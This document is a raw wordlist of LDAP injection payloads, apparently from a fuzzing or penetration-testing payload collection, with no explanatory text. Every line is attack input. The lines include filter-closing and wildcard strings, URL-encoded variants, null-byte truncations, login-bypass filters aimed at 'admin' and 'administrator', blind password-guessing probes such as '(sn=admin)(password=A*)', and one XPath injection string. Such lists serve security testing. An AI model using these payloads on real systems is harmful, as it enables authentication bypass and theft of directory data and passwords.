!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
(&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
(&(objectClass=user)(uid=*))
(&(sn=admin)(password=*))
(&(sn=admin)(password=A*))
(&(sn=admin)(password=B*))
(&(sn=administrator)(password=*))
(&(sn=administrator)(password=A*))
(&(sn=administrator)(password=B*))
(&(uid= admin)(!(& (|) (password=any))))
(&(uid=admin)) (| (|) (webpassword=any))
(&(user=*)(&)(password=*)(&))
(&(user=*)(password=*)(&))
(&(user=*)(password=*))
(&(user=*)(|(&)(pass=pwd))
(&(user=*)(|(password=*)(password=test))
(&(user=*))%00
)
)(cn=))\x00
*
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(&
*)(objectClass=*))(&objectClass=void
*)(uid=*))(|(uid=*
*)(|(&
*)(|(*
*)(|(password=*
*))%00
*/*
*|
/
//
//*
@*
admin)(!(&(|
admin)(&)
admin))(|(|
admin*
admin*)((|password=*)
admin*)((|Password=*)
admin*)((|userPassword=*)
admin*)((|userpassword=*)
any))
pwd
pwd)
pwd))
void)(objectClass=void))(&objectClass=void
x' or name()='username' or 'x'='y
|